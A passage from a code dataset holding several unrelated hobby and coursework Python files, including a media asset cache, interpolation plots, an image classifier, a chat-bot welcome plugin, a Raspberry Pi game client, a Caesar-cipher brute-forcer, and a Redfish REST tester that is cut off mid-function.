s.append(input())\n\nw = []\nfor _ in range(m):\n w.append(input())\n\ncount = 0\nfor i in w:\n if i in s:\n count += 1\n\nprint(count)","repo_name":"hyeongwoo-LEE/Algorithm-python","sub_path":"baekjoon_v1/14425_문자열집합.py","file_name":"14425_문자열집합.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24908210364","text":"import sqlite3\r\nimport sys\r\n\r\ndef io_dur(dur, mki, mko):\r\n if not dur: return 0\r\n if mko > 0: dur -= dur - mko\r\n if mki > 0: dur -= mki\r\n return dur\r\n\r\n\r\nclass DramaticaObject(object):\r\n default = {\r\n \"title\" : \"Unnamed object\"\r\n }\r\n\r\n def __init__(self, **kwargs):\r\n self.meta = {}\r\n self.meta.update(self.default)\r\n self.meta.update(kwargs)\r\n\r\n def __getitem__(self, key):\r\n return self.meta.get(key, False)\r\n\r\n def __setitem__(self, key, value):\r\n self.meta[key] = value\r\n\r\n def __delitem__(self, key):\r\n if key in self.meta:\r\n del (self.meta[key])\r\n\r\n\r\nclass DramaticaAsset(DramaticaObject):\r\n default = {\r\n \"is_optional\" : \"1\"\r\n }\r\n def __init__(self, **kwargs):\r\n super(DramaticaAsset, self).__init__(**kwargs)\r\n self.veto = False\r\n self.weights = {}\r\n\r\n @property \r\n def id(self):\r\n return self[\"id_object\"]\r\n\r\n @property\r\n def duration(self):\r\n dur = float(self.meta.get(\"duration\",0))\r\n mki = float(self.meta.get(\"mark_in\" ,0))\r\n mko = float(self.meta.get(\"mark_out\",0))\r\n if not dur: return 0\r\n if mko > 0: dur -= dur - mko\r\n if mki > 0: dur -= mki\r\n return dur\r\n\r\n def __repr__(self):\r\n t = \"Asset ID:{}\".format(self.id)\r\n if self[\"title\"]:\r\n try:\r\n t += \" ({})\".format(self[\"title\"])\r\n except:\r\n pass\r\n return t\r\n\r\nclass DramaticaCache(object):\r\n def __init__(self, tags):\r\n self.conn = sqlite3.connect(\":memory:\")\r\n self.cur = self.conn.cursor()\r\n self.assets = {}\r\n self.tags = tags + [\r\n (int, \"dramatica/weight\"),\r\n (float, \"io_duration\")\r\n ]\r\n tformat = \", \".join([\"`{}` {}\".format(tag, {int:\"INTEGER\", str:\"TEXT\", float:\"REAL\"}[t]) for t, tag in self.tags])\r\n self.cur.execute(\"CREATE TABLE assets (id_object INTEGER PRIMARY KEY, {})\".format(tformat))\r\n self.cur.execute(\"CREATE TABLE history (id_channel INTEGER, tstamp INTEGER, id_asset INTEGER)\")\r\n self.conn.commit()\r\n\r\n def load_assets(self, data_source):\r\n self.cur.execute(\"DELETE FROM assets;\")\r\n for i, asset in enumerate(data_source):\r\n id_object = asset[\"id_object\"]\r\n asset[\"io_duration\"] = io_dur(asset.get(\"duration\",0), asset.get(\"mark_in\", 0), asset.get(\"mark_out\", 0))\r\n self.cur.execute(\"INSERT INTO assets VALUES (?, {})\".format(\",\".join([\"?\"]*len(self.tags))), [id_object] + [asset.get(k, None) for t, k in self.tags ])\r\n self.assets[id_object] = DramaticaAsset(**asset)\r\n if i % 50 == 0:\r\n print(\"Loading assets\")\r\n self.conn.commit()\r\n \r\n def load_history(self, data_source, start=False, stop=False):\r\n if not (start or stop):\r\n self.cur.execute(\"DELETE FROM history;\")\r\n else:\r\n conds = []\r\n if start:\r\n conds.append(\"tstamp > {}\".format(start))\r\n if stop:\r\n conds.append(\"tstamp < {}\".format(stop))\r\n self.cur.execute(\"DELETE FROM history WHERE {}\".format(\" AND \".join(conds)))\r\n self.conn.commit()\r\n i = 0\r\n for id_channel, tstamp, id_asset in data_source:\r\n self.cur.execute(\"INSERT INTO history VALUES (?,?,?)\", [id_channel, tstamp, id_asset])\r\n i+=1\r\n 
if i % 20 == 0:\r\n yield \"Loading history\"\r\n self.conn.commit()\r\n \r\n def __getitem__(self, key):\r\n key = int(key)\r\n if key in self.assets:\r\n return self.assets[key]\r\n\r\n def sanit(self, instr):\r\n try:\r\n return str(instr).replace(\"''\",\"'\").replace(\"'\",\"''\").decode(\"utf-8\")\r\n except:\r\n return instr.replace(\"''\",\"'\").replace(\"'\",\"''\")\r\n\r\n def query(self, *args, **kwargs):\r\n try:\r\n self.cur.execute(*args)\r\n except:\r\n print(args)\r\n print(sys.exc_info())\r\n raise Exception\r\n if kwargs.get(\"one_column\", False):\r\n return [i[0] for i in self.cur.fetchall()]\r\n else:\r\n return self.cur.fetchall()\r\n","repo_name":"michaeltoohig/dramatica","sub_path":"dramatica/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19104298647","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n#Taking input from file:\n\ndef readfile(filename):\n\tcoordinates = []\n\twith open(filename) as f:\n\t\tlines = f.readlines()\n\t\tfor line in lines[1:]: \n\t\t\tvalues = line.split()\n\t\t\tcoordinate = (float(values[0]) ,\n\t\t\t\t float(values[1]) )\n\t\t\tcoordinates.append(coordinate)\n\treturn coordinates\n\t\n\t\ncoordinates = readfile(\"data.txt\")\nX = [-7.0, -9.0, 0.0, 9.0, 8.0, 3.0, -3.0 ]\nY = [2.0, 8.0, 1.0, 9.0, 5.0, -3.0, -7.0]\t\n\t\n\t\n#Lagrange Part:\n\t\ndef lagrange(coordinates, x):\n\tn = len(coordinates)\n\ty = 0.0\n\t\n\tfor i in range(n):\n\t\tfi = coordinates[i][1]\n\t\tprod = fi\n\t\tfor j in range(n):\n\t\t\tif j !=i:\n\t\t\t\txi = coordinates[i][0]\n\t\t\t\txj = coordinates[j][0]\n\t\t\t\tprod = prod * ((x-xj)/(xi-xj))\n\t\ty+=prod\n\treturn y\n\t\t\n\n\nxs = np.arange(-10,10,0.1)\nys = []\n\n\nfor x in xs:\n\tys.append(lagrange(coordinates, x))\n\t\n\t\nplt.plot(xs, ys)\nplt.plot(X,Y,'o')\nplt.show()\n\n\n#Newtons Part: \n\t\ndef b(X, Y, r, l):\n\tif l==r:\n\t\treturn Y[l]\n\treturn ( b(X, Y, r, l+1) - b(X, Y, r-1, l) )/(X[r]-X[l])\n\t\n\n\ndef Newton(x):\n\tsum_ = 0.\n\tfor i in range(len(X)):\n\t\t#print(i)\n\t\tmul = b(X, Y, i, 0)\n\t\tfor j in range(i):\n\t\t\tmul *= (x-X[j])\n\t\tsum_ += mul\n\treturn sum_\t\t\n\t\t\n\t\t\n\nx = np.arange(-10, 10, 0.1)\ny = Newton(x)\n\n\nplt.plot(x, y)\nplt.plot(X, Y, 'o')\nplt.show()\n\n\n\n\n\n\n","repo_name":"Sowmik23/Numerical-Lab-3-2","sub_path":"Lab-04(Lagrange_Interpolation)/LagrangeInterpolation.py","file_name":"LagrangeInterpolation.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"40063360947","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pathlib\nimport random\n\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\nimport tensorflowjs as tfjs\n\n\n#tfjs_target_dir = 'tfjs_target_dir'\ntfjs_models_dir = 'tf_models'\n\n\ndata_root = pathlib.Path('../data_tf_dataset')\n\nall_image_paths = list(data_root.glob('*/*'))\nall_image_paths = [str(path) for path in all_image_paths]\n\nlabel_names = sorted(item.name for item in data_root.glob('*/') if item.is_dir())\n\nlabel_to_index = dict((name, index) for index, name in enumerate(label_names))\n\n\nall_image_labels = [label_to_index[pathlib.Path(path).parent.name] for path in all_image_paths]\n\n\npath_ds = 
tf.data.Dataset.from_tensor_slices(all_image_paths)\n\n\nlabel_ds = tf.data.Dataset.from_tensor_slices(tf.cast(all_image_labels, tf.int64))\n\nall_images_as_np = np.array([tf.image.resize(mpimg.imread(image_path), [256, 256]) for image_path in all_image_paths])\n\n\nall_image_labels_as_np = np.array(all_image_labels)\n\n\nall_index = list(range(all_image_labels_as_np.shape[0]))\n\nrandom.shuffle(all_index)\n\nall_index_random_train = all_index[0:(3 * len(all_index) // 4)]\nall_index_random_test = all_index[(3 * len(all_index) // 4):]\n\n\nprint(len(all_index_random_train), len(all_index_random_test))\n\nall_images_as_np_shuffled = all_images_as_np[all_index]\n\n\nall_labels_as_np_shuffled = all_image_labels_as_np[all_index]\n\n\nx_train = all_images_as_np_shuffled[0:(3 * len(all_index) // 4)]\nx_test = all_images_as_np_shuffled[(3 * len(all_index) // 4):]\n\n\ny_train = all_labels_as_np_shuffled[0:(3 * len(all_index) // 4)]\ny_test = all_labels_as_np_shuffled[(3 * len(all_index) // 4):]\n\nnum_classes = 2\ninput_shape = (256, 256, 3)\n\n\nx_train = x_train / 255\nx_test = x_test / 255\n\nx_train_exp = np.expand_dims(x_train, -1)\nx_test_exp = np.expand_dims(x_test, -1)\n\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\nprint(y_train.shape, y_test.shape)\n\nmodel = keras.Sequential(\n    [\n        keras.Input(shape=input_shape),\n        layers.Conv2D(32, kernel_size=(3, 3), activation=\"relu\"),\n        layers.MaxPooling2D(pool_size=(2, 2)),\n        layers.Conv2D(64, kernel_size=(3, 3), activation=\"relu\"),\n        layers.MaxPooling2D(pool_size=(2, 2)),\n        layers.Flatten(),\n        layers.Dropout(0.5),\n        layers.Dense(num_classes, activation=\"softmax\"),\n    ]\n)\n\nmodel.summary()\n\nbatch_size = 16\nepochs = 6\n\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=\"adam\", metrics=[\"accuracy\"])\nmodel.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, validation_split=0.25)\n\ntfjs.converters.save_keras_model(model, tfjs_models_dir)","repo_name":"contemplat0r/tf_pwa_test","sub_path":"code/tf_dataset_exp.py","file_name":"tf_dataset_exp.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28144834552","text":"from nonebot import on_notice\nfrom nonebot.typing import T_State\nfrom nonebot.adapters.cqhttp import Bot, Message, GroupDecreaseNoticeEvent, GroupIncreaseNoticeEvent\n \nwelcome = on_notice()\n# a new member joins the group\n@welcome.handle()\nasync def _(bot: Bot, event:GroupIncreaseNoticeEvent, state: T_State):\n    user = event.get_user_id()\n    at_ = \"[CQ:at,qq={}]\".format(user)\n    msg = at_ + '欢迎您的加入!我是机器人晚星,您可以直接在群聊/私聊我来查询自己的授权时长信息,只需对我说 查询+手机号 (示例:查询 12345678901) 即可哦'\n    msg = Message(msg)\n    await welcome.finish(message=msg)\n \n# a member leaves the group\n@welcome.handle()\nasync def _(bot: Bot, event:GroupDecreaseNoticeEvent, state: T_State):\n    user = event.get_user_id()\n    at_ = \"[CQ:at,qq={}]\".format(user)\n    msg = at_ + '\\n' + '一位朋友离我们而去!'\n    msg = Message(msg)\n    await welcome.finish(message=msg)","repo_name":"Nell3582/ScriptWorkflows","sub_path":"qqbot/weclome.py","file_name":"weclome.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"40043000256","text":"#!/bin/python3\r\n\r\n# example Pyro4 client script\r\n\r\nimport sys\r\nimport random\r\nimport time\r\nimport threading\r\nimport Pyro4.core\r\nimport RPi.GPIO as GPIO\r\nimport 
os\r\n\r\ntime.sleep(5)\r\n\r\n\r\nclass Client():\r\n# Cable class\r\n\r\n    def __init__(self):\r\n\t\r\n        self.connect() # connect to the name server and the distant server script\r\n        self.flag=[False,False,False] \r\n        self.temps=[0,0,0]\r\n        self.etat=[0,0,0,0]\r\n\r\n    def connect(self):\r\n        connected=False\r\n        while connected==False:\r\n            try:\r\n                self.ipserveur=\"192.168.233.1\" # Pyro server IP\r\n                \r\n\r\n                self.nameserver=Pyro4.locateNS(host=self.ipserveur,port=9090) # locate the Pyro4 name server\r\n                self.uri = self.nameserver.lookup(\"xxxx\") # look up the distant object xxxx on the name server\r\n                self.server = Pyro4.Proxy(self.uri) # establish connection to the distant object\r\n                connected=True # success\r\n\t\t\t\t\r\n            except:# sleep 5 seconds before trying to reconnect\r\n                print(\"waiting for server\")\r\n\r\n                time.sleep(5)\r\n\r\n    def refresh(self): # refresh flags, state and temps from the server every 500ms\r\n        try:\r\n            self.flag=self.server.getflag() #1: run #2 win #3 lost #4 reset #5 flash\r\n            self.etat=self.server.getetat() #list of 5 int\r\n            self.temps=self.server.gettemps() #1 time, #2 additional time\r\n            \r\n        except: # Automatic reconnection if the connection is lost \r\n            print(\"Connection lost. REBINDING...\")\r\n            print(\"(restart the server now)\")\r\n            self.server._pyroReconnect()\r\n            time.sleep(5)\r\n        threading.Timer(0.5, script.refresh).start()\r\n        \r\nscript=Client() #\r\nscript.refresh()\r\n\r\njack1=17\r\njack2=18\r\njack3=27\r\njack4=22\r\n\r\nrelay=21\r\n\r\nGPIO.setmode(GPIO.BCM)  # pin numbering mode must be set before GPIO.setup; BCM is assumed here from the pin numbers used\r\nGPIO.setup(jack1, GPIO.IN, pull_up_down=GPIO.PUD_UP)\r\nGPIO.setup(jack2, GPIO.IN, pull_up_down=GPIO.PUD_UP)\r\nGPIO.setup(jack3, GPIO.IN, pull_up_down=GPIO.PUD_UP)\r\nGPIO.setup(jack4, GPIO.IN, pull_up_down=GPIO.PUD_UP)\r\nGPIO.setup(relay, GPIO.OUT, initial=GPIO.LOW)\r\n\r\n\r\n\r\nwhile True:\r\n    \r\n#infinite loop for game \r\n    try:\r\n\r\n\r\n\r\n        if script.flag[0] == True:\r\n            if GPIO.input(jack1) == False and GPIO.input(jack2) == False and GPIO.input(jack3) == False and GPIO.input(jack4) == False:\r\n                GPIO.output(relay,GPIO.HIGH)\r\n                script.server.changeetat(0,1)\r\n            else:\r\n                \r\n                GPIO.output(relay,GPIO.LOW)\r\n        elif script.flag[1]==False and script.flag[2]==False:\r\n            script.server.changeetat(0,0)\r\n            GPIO.output(relay,GPIO.LOW)\r\n            \r\n        time.sleep(0.3)\r\n    except KeyboardInterrupt:\r\n        GPIO.cleanup() \r\n\r\n\r\n","repo_name":"toz00/pyroEscape","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"44574598545","text":"import importlib\nfrom string import ascii_lowercase as lc\nimport sys\n\nfile = open(sys.argv[1], 'r').read().lower()\n\ndef brute_force():\n    for key in range(1,26):\n        resultado = ''\n        print(f'Key: {key}')\n        for letra in file:\n            if letra in lc:\n                index = lc.find(letra)\n                index = (index - key) % 26\n                resultado += lc[index]\n            else:\n                resultado += letra\n        \n        print(resultado)\n\nif __name__ == '__main__':\n    brute_force()\n","repo_name":"lucasferreira94/CifraCesarPY","sub_path":"brute_force.py","file_name":"brute_force.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31536319185","text":"orders = int(input())\ntotal_price = 0\n\nfor _ in range(orders):\n\n    price_capsule = float(input())\n    days = int(input())\n    daily_capsules = int(input())\n\n    if (\n        (price_capsule < 0.01 or price_capsule > 100.00) or\n        (days < 1 or days > 31) or\n        (daily_capsules < 1 or daily_capsules > 2000)\n    
):\n continue\n\n price = daily_capsules * days * price_capsule\n print(f\"The price for the coffee is: ${price:.2f}\")\n total_price += price\n\nprint(f\"Total: ${total_price:.2f}\")\n\n","repo_name":"VladiDemirev/fundamentals","sub_path":"BasicSyntaxConditionalStatementsAndLoopsExercise/05Orders.py","file_name":"05Orders.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5171532344","text":"import os\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\nos.environ['CUDA_VISIBLE_DEVICES'] = \"0\"\nfrom tensorflow.python.client import device_lib\nprint(device_lib.list_local_devices())\n\nimport sys\nimport time\nimport numpy as np\n\n# COCO\nfrom pycocotools.coco import COCO\nfrom pycocotools.cocoeval import COCOeval\nfrom pycocotools import mask as maskUtils\n\nfrom mrcnn.evaluate import build_coco_results, evaluate_coco\nfrom mrcnn.dataset import ds\n\nimport zipfile\nimport urllib.request\nimport shutil\n\nROOT_DIR = os.getcwd()\n\n# Import Mask RCNN\nsys.path.append(ROOT_DIR) # To find local version of the library\nfrom mrcnn.config import Config\nfrom mrcnn import model as modellib, utils\n\n\nPRETRAINED_MODEL_PATH = os.path.join(ROOT_DIR,\"data/\" \"pretrained_weights.h5\")\nLOGS_DIRECTORY = os.path.join(ROOT_DIR, \"logs\")\n\nclass configobj(Config):\n \"\"\"Configuration for training on data in MS COCO format.\n Derives from the base Config class and overrides values specific\n to the COCO dataset.\n \"\"\"\n # Give the configuration a recognizable name\n NAME = \"FRS\"\n\n # We use a GPU with 12GB memory, which can fit two images.\n # Adjust down if you use a smaller GPU.\n IMAGES_PER_GPU = 1\n\n # Uncomment to train on 8 GPUs (default is 1)\n GPU_COUNT = 1\n\n # Number of classes (including background)\n NUM_CLASSES = 1 + 1 # 1 Backgroun + 1 Building\n\n STEPS_PER_EPOCH=1000\n VALIDATION_STEPS=50\n\n\n IMAGE_MAX_DIM=320\n IMAGE_MIN_DIM=320\n\nconfig = configobj()\nconfig.display()\n\nmodel = modellib.MaskRCNN(mode=\"training\", config=config, model_dir=LOGS_DIRECTORY)\n# Load pretrained weights\nmodel_path = model.find_last()[1]\nprint(model_path)\nmodel.load_weights(model_path, by_name=True)\n\n# Load training dataset\ndataset_train = ds()\ndataset_train.load_dataset(dataset_dir=os.path.join(\"data\", \"train\"), load_small=True)\ndataset_train.prepare()\n\n# Load validation dataset\ndataset_val = ds()\nval_coco = dataset_val.load_dataset(dataset_dir=os.path.join(\"data\", \"val\"), load_small=True, return_coco=True)\ndataset_val.prepare()\n\n# Training - Stage 1\nprint(\"Training network heads\")\nmodel.train(dataset_train, dataset_val,\n learning_rate=config.LEARNING_RATE,\n epochs=30,\n layers='heads')\n\n# Training - Stage 2\n# Finetune layers from ResNet stage 4 and up\nprint(\"Fine tune Resnet stage 4 and up\")\nmodel.train(dataset_train, dataset_val,\n learning_rate=config.LEARNING_RATE,\n epochs=50,\n layers='4+')\n\n# Training - Stage 3\n# Fine tune all layers\nprint(\"Fine tune all layers\")\nmodel.train(dataset_train, dataset_val,\n learning_rate=config.LEARNING_RATE / 5,\n epochs=70,\n layers='all')\n","repo_name":"oiynick/rcnn_buildings","sub_path":"Training.py","file_name":"Training.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7181476136","text":"#!/usr/bin/env python3\nimport 
sys,os\n#sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)),'CRTT_lib'))\nimport urllib.request\nimport urllib.parse\nfrom urllib.error import URLError, HTTPError\nfrom urllib.parse import urlparse\nfrom datetime import datetime\nfrom datetime import timedelta\nimport socket \nimport json\nfrom distutils.version import LooseVersion\n\nfrom CRTT.loglib import logger\n#from CRTT_Error import HttpTimeError\nfrom CRTT.retry import retry\nfrom CRTT.config import CONF\nimport os.path\nimport configparser\nimport re,ast\nfrom CRTT.crtt_json import *\n\nsocket.setdefaulttimeout(CONF.REQUEST.timeout)\nVERSION = '1.0.0'\n\nclass GEN_URL():\n\t'''\n\tBuild complete URL\n\n\t:param host: IP address or domain name of the target \n\t\tRest Server's resource interface.\n\t:type host: str\n\t:param path: the path of the URL to access a specific Redfish Node.\n\t\texample:'/redfish/v1'\n\t:type path: str, optional\n\t:param url: the url of a specific Redfish Node.\n\t\texample:'http://10.204.29.221:8888/redfish/v1/Managers/1'\n\t:type url: str, optional\n\n\t:output get_url: return completed URL to access a specific node.\n\t:type get_url: str\n\t:output get_path: return path of an URL.\n\t:type get_url: str\n\t'''\n\tsupported_rest_versions = CONF.REST.ver_support\n\n\tdef __init__(self,host,scheme='http',rest_version=None,port=8888):\n\t\tself._empty_com=urlparse('')\n\t\tself._scheme=scheme\n\t\tport=str(port)\n\t\tself._netloc=host+\":\"+port\n\t\tself.cli_name = CONF.REST.client_name\n\t\tself._rest_version = rest_version\n\t\tself.new_url=''\n\n\tdef _check_rest_version(self, version):\n\t\t\"\"\"Validate a REST API version is supported by the library and target array.\"\"\"\n\t\tversion = str(version)\n\t\tif version not in self.supported_rest_versions:\n\t\t\tmsg = \"Library is incompatible with REST API version {0}\"\n\t\t\traise ValueError(msg.format(version))\n\t\treturn version\n\n\tdef _choose_rest_version(self):\n\t\t\"\"\"Return the latest REST API version supported by target array.\"\"\"\n\t\treturn max(self.supported_rest_versions, key=LooseVersion)\n\n\tdef _gen_rest_ver(self):\n\t\tif self._rest_version:\n\t\t\t# check input version whether is in support list\n\t\t\tself._rest_version = self._check_rest_version(self._rest_version)\n\t\telse:\n\t\t\tself._rest_version = self._choose_rest_version()\n\n\tdef get_url(self, path=None):\n\t\tif path == None or path == 'None' or path == '':\n\t\t\tself._gen_rest_ver()\n\t\t\tpath=\"/{0}/v{1}\".format(self.cli_name, self._rest_version)\n\t\telse:\n\t\t\tcurrent_url=urlparse(path)\n\t\t\tif self._scheme == current_url.scheme or \":\" in current_url.netloc:\n\t\t\t\tself._netloc=current_url.netloc\n\t\t\t\treturn path\n\n\t\tnew_url_obj=self._empty_com._replace(scheme='http', netloc=self._netloc,path=path)\n\t\tself.new_url= new_url_obj.geturl()\n\t\treturn self.new_url\n\n\tdef get_path(self,url=None):\n\t\tif url==None:\n\t\t\turl=self.new_url\n\t\treturn urllib.parse.urlparse(url).path\n\n#url=GEN_URL('10.204.29.221')\n#print(url.get_url('/redfish/v2')\n\nclass GET_NODE(object):\n\tdef __init__(self,host,app_ver, port):\n\t\tself.host=host\n\t\tself.url_list=[]\n\t\tself.app_ver=app_ver\n\t\tself.port=port\n\t\tself.url_obj=GEN_URL(host=self.host, rest_version=self.app_ver,port=self.port)\n\n\tdef scan_node(self,node_path=None):\n\t\t\"\"\"\n\t\tnode_path: str, get the root url if node_path is None\n\t\t\"\"\"\n\t\tnode_url=self.url_obj.get_url(node_path)\n\t\t\n\t\tif CONF.REST.client_name in 
node_url:\n\t\t\tself.url_list.append(node_url)\n\t\t\tfor sub_node_path in self.__get_sub_node(node_url):\n\t\t\t\tif sub_node_path != \"\":\n\t\t\t\t\tself.scan_node(sub_node_path)\n\t\treturn self.url_list\n\n\tdef __get_sub_node(self,node_url):\n\t\turl_request=URL_REQUEST(node_url)\n\t\turl_request.get_req()\n\n\t\tall_dict_got=[]\n\t\tall_dict_got=url_request.all_dict_in_response\n\t\tsub_node_path_list=[]\n\t\tif len(all_dict_got)>0:\n\t\t\tfor sub_dict in all_dict_got:\n\t\t\t\tfor key_conf in CONF.REST.subnode_keys:\n\t\t\t\t\tfor key_host,value_host in sub_dict.items():\n\t\t\t\t\t\tif key_host == key_conf:\n\t\t\t\t\t\t\tif value_host not in sub_node_path_list and \\\n\t\t\t\t\t\t\t\tself.url_obj.get_url(value_host) not in self.url_list:\n\t\t\t\t\t\t\t\tsub_node_path_list.append(value_host)\n\t\t#sub_node_path_list.remove(self.url_obj.get_path(node_url))\n\t\treturn sub_node_path_list\n\t\t\n\nclass URL_REQUEST():\n\n\tdef __init__(self,url,username=None, password=None):\n\t\tif CONF.REST.client_name not in url:\n\t\t\traise ValueError(\"Not a valid redfish URL\")\n\t\tself.response_dict={}\n\t\tself.all_dict_in_response={}\n\t\tself.url=url.strip().replace(\" \", \"%20\")\n\t\tself.username=username\n\t\tself.password=password\n\t\tself.response_check=Reponse_check()\n\n\t@retry((HTTPError,socket.timeout,URLError,ValueError), \n\t\t\ttries=CONF.REQUEST.retries, delay=CONF.REQUEST.delay,\n\t\t\tbackoff=CONF.REQUEST.backoff, stoponerror=CONF.REQUEST.failonerror,\n\t\t\tlogger=logger)\n\tdef get_req(self,values=None):\n\t\tif values:\n\t\t\tif not isinstance(values,dict):\n\t\t\t\traise TypeError(\"POST data should be a python dict\")\n\t\t\telse:\n\t\t\t\tmsg=\"POST: Attempting to request URL: {0}\".format(self.url)\n\t\t\t\tdata = urllib.parse.urlencode(values)\n\t\t\t\tdata = data.encode('ascii') # data should be bytes\n\t\t\t\treq = urllib.request.Request(self.url, data)\n\t\telse:\n\t\t\tmsg=\"GET: Attempting to request URL: {0}\".format(self.url)\n\t\t\treq = urllib.request.Request(self.url)\n\t\tlogger.info(msg)\n\n\t\ttry:\n\t\t\tstart_time=datetime.now()\n\t\t\tresponse = urllib.request.urlopen(req)\n\t\t\t#Need close the urlopen here??? or just run Burn-in\n\t\texcept URLError as ue:\n\t\t\tif hasattr(ue,'reason'):\n\t\t\t\tmsg='Failed to reach {1}: {0}.'.format(ue.reason,self.url)\n\t\t\t\tlogger.error(msg)\n\t\t\telif hasattr(ue,'code'):\n\t\t\t\tmsg='The server couldn\\'t fulfill the request. 
Error code: {0}'\\\n\t\t\t\t\t.format(ue.code)\n\t\t\t\tlogger.error(msg)\n\t\t\t\tif ue.code==401:\n\t\t\t\t\tself.Send_Auth()\n\t\t\traise\n\t\telse:\n\t\t\tend_time=datetime.now()\n\t\t\tdata=response.read().decode('utf-8')\n\t\t\t#To run Burn-in test, keep response.close() commented\n\t\t\t#response.close()\n\n\t\t\trequest_time=(end_time-start_time).total_seconds()\n\t\t\tmsg=\"Spent {0:6f}s to get response from {1:s}\"\\\n\t\t\t\t.format(request_time,self.url)\n\t\t\tlogger.debug(msg)\n\t\t\tself.response_check.request_time_check(request_time,self.url)\n\n\t\ttry:\n\t\t\tself.response_dict=json.loads(data)\n\t\t\tself.all_dict_in_response=json._default_decoder.all_dicts\n\t\texcept ValueError as ve:\n\t\t\tmsg=\"Got invalid feedback from RESTful server when opening URL:{0}, \\\n\t\t\t\tinfo:{1}\".format(self.url,data)\n\t\t\tlogger.error(msg)\n\t\t\traise\n\t\t#self.response_check.confcompare(self.response_dict,CONF.MAIN.value_file)\n\t\tself.response_check.confcompare(self.response_dict['Name'],\\\n\t\t\t\t\tself.all_dict_in_response,CONF.MAIN.value_file)\n\t\treturn self.response_dict\n\n\tdef Send_Auth(self):\n\t\tif not (self.username and self.password):\n\t\t\traise ValueError(\"Must specify both username and password, \\\n\t\t\t\tas Server asks Authentication!\")\n\t\tpassword_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()\n\t\tpassword_mgr.add_password(None, self.url, self.username, self.password)\n\t\n\t\tauthhandler = urllib.request.HTTPBasicAuthHandler(password_mgr)\n\t\topener = urllib.request.build_opener(authhandler)\n\t#opener.open(url)\n\t\turllib.request.install_opener(opener)\n\nclass Reponse_check(object):\n\tdef __init__(self):\n\t\tpass\n\tdef confcompare(self, current_url_name, all_dict_got, conf_file):\n\t\tif not os.path.isfile(conf_file):\n\t\t\tmsg='Didn\\'t find compare files to check the response data.'\n\t\t\tlogger.error(msg)\n\t\tconf = configparser.ConfigParser()\n\t\tconf.optionxform = str\n\t\tconf.read(conf_file)\n\t\tif current_url_name in conf:\n\t\t\tfor dict_got in all_dict_got:\n\t\t\t\tfor key_got, value_get in dict_got.items():\n\t\t\t\t\tfor check_item,check_spec in conf[current_url_name].items():\n\t\t\t\t\t\tif key_got==check_item:\n\t\t\t\t\t\t\tif \"<\" in check_spec:\n\t\t\t\t\t\t\t\tself.__threshold_check(current_url_name,check_item, check_spec, dict_got[check_item])\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tif str(dict_got[check_item])==check_spec.strip():\n\t\t\t\t\t\t\t\t\tmsg=\"{0}: Value matched for key: {1}, got: {2}\"\\\n\t\t\t\t\t\t\t\t\t\t.format(current_url_name,check_item, check_spec.strip())\n\t\t\t\t\t\t\t\t\tlogger.info(msg)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tmsg=\"{0}: Value mismatched for key: {1}, expect: {2}, got: {3}\"\\\n\t\t\t\t\t\t\t\t\t.format(current_url_name,check_item, check_spec.strip(),str(dict_got[check_item]))\n\t\t\t\t\t\t\t\t\tlogger.error(msg)\n\t\n\tdef request_time_check(self, request_time,url):\n\t\tmsg=\"RESTful Server takes '{0}' to respond URL:{1}\".format(request_time,url)\n\t\tif request_time>CONF.REQUEST.http_time_warn and request_time<CONF.REQUEST.http_time_error:\n\t\t\tlogger.warning(msg)\n\t\telif request_time>CONF.REQUEST.http_time_error:\n\t\t\tlogger.error(msg)\n\n\tdef __threshold_check(self, current_url_name, key, threshold, value):\n\t\tthh=re.split('<',threshold)\n\t\tthh_n=[]\n\t\ti=0\n\t\tfor th in thh:\n\t\t\tif 'x'==th.strip() or 'X'==th.strip():\n\t\t\t\tx=i\n\t\t\t\tthh_n.append(value)\n\t\t\telse:\n\t\t\t\tthh_n.append(ast.literal_eval(th.strip()))\n\t\t\ti+=1\n\t\n\t\tthh_n.sort()\n\t\tsi=thh_n.index(value)\n\t\n\t\toffset=si-x\n\t\tif 
